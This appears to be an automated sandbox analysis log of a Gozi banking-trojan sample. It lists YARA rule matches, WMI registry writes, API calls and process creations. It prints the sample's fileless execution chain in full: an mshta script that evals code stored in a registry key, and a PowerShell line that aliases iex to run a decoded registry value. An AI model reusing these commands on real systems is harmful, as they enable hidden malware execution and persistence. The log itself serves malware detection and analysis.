                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: main.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2620, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D82FC | 0_2_006D82FC
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D2DCC | 0_2_006D2DCC
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D2792 | 0_2_006D2792
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError | 0_2_00401493
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset | 0_2_00401D95
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00401F78 NtMapViewOfSection | 0_2_00401F78
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose | 0_2_006D737C
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D8521 NtQueryVirtualMemory | 0_2_006D8521
                Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: main.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: main.exe | Virustotal: Detection: 61%
                Source: C:\Users\user\Desktop\main.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\main.exe C:\Users\user\Desktop\main.exe
                Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\main.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmpv3qo3.pur.ps1
                Source: classification engine | Classification label: mal100.troj.winEXE@5/2@3/1
                Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D7256 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification | 0_2_006D7256
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_01
                Source: C:\Users\user\Desktop\main.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006DB859 push 0000006Fh; retf | 0_2_006DB85C
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D82EB push ecx; ret | 0_2_006D82FB
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_006D7F00 push ecx; ret | 0_2_006D7F09
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_0040134F LoadLibraryA,GetProcAddress | 0_2_0040134F

                Hooking and other Techniques for Hiding and Protection

                Source: Yara match | File source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara match | File source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\main.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\Desktop\main.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9567
                Source: C:\Users\user\Desktop\main.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\Desktop\main.exe | Process information queried: ProcessInformation
